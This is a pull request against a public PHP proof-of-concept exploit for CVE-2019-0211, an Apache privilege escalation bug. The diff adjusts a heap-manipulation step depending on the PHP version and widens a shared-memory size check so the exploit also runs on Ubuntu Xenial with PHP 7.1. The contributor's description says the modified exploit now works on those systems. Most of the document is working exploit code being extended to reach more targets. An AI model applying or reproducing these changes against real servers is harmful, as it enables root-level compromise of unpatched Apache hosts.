### PR TITLE
Little modifications to support php 7.1 and Ubuntu Xenial

### DIFF
--- a/CVE-2019-0211-apache/cfreal-carpediem.php
+++ b/CVE-2019-0211-apache/cfreal-carpediem.php
@@ -181,7 +181,8 @@ class Z implements JsonSerializable
 		$protector = ".$_protector";
 		# !!! This is only required for apache
 		# Got no idea as to why there is an extra deallocation (?)
-		$room[] = "!$_protector";
+		if(version_compare(PHP_VERSION, '7.2') >= 0)
+            		$room[] = "!$_protector";
 
 		o('  Creating DateInterval object');
 		# After this line:

--- a/CVE-2019-0211-apache/cfreal-carpediem.php
+++ b/CVE-2019-0211-apache/cfreal-carpediem.php
@@ -645,7 +645,8 @@ function get_all_addresses()
 		{
             $line = explode(' ', $line)[0];
             $bounds = array_map('hexdec', explode('-', $line));
-            if ($bounds[1] - $bounds[0] == 0x14000)
+	    $msize = $bounds[1] - $bounds[0];
+            if ($msize >= 0x10000 && $msize <= 0x16000)
             {
                 $addresses['shm'] = $bounds;
                 $follows_shm = true;


### PR DESCRIPTION
Hi,

I would like to thank you a lot for this PoC and this write-up, 
it allows me to have a better understanding because I'm new to this kind of exploits.

I've tried this PoC on Debian 9 and Ubuntu Xenial, with php 7.1/7.2/7.3 and it seems the SHM memory map size is not the same (0x14000 on debian and 0x12000 on ubuntu).
I have also added a condition for php 7.1 because I think this version doesn't do the extra deallocation you mentioned. It works with these modifications.

Thank you again for this amazing exploit,
Bests regards,
Load.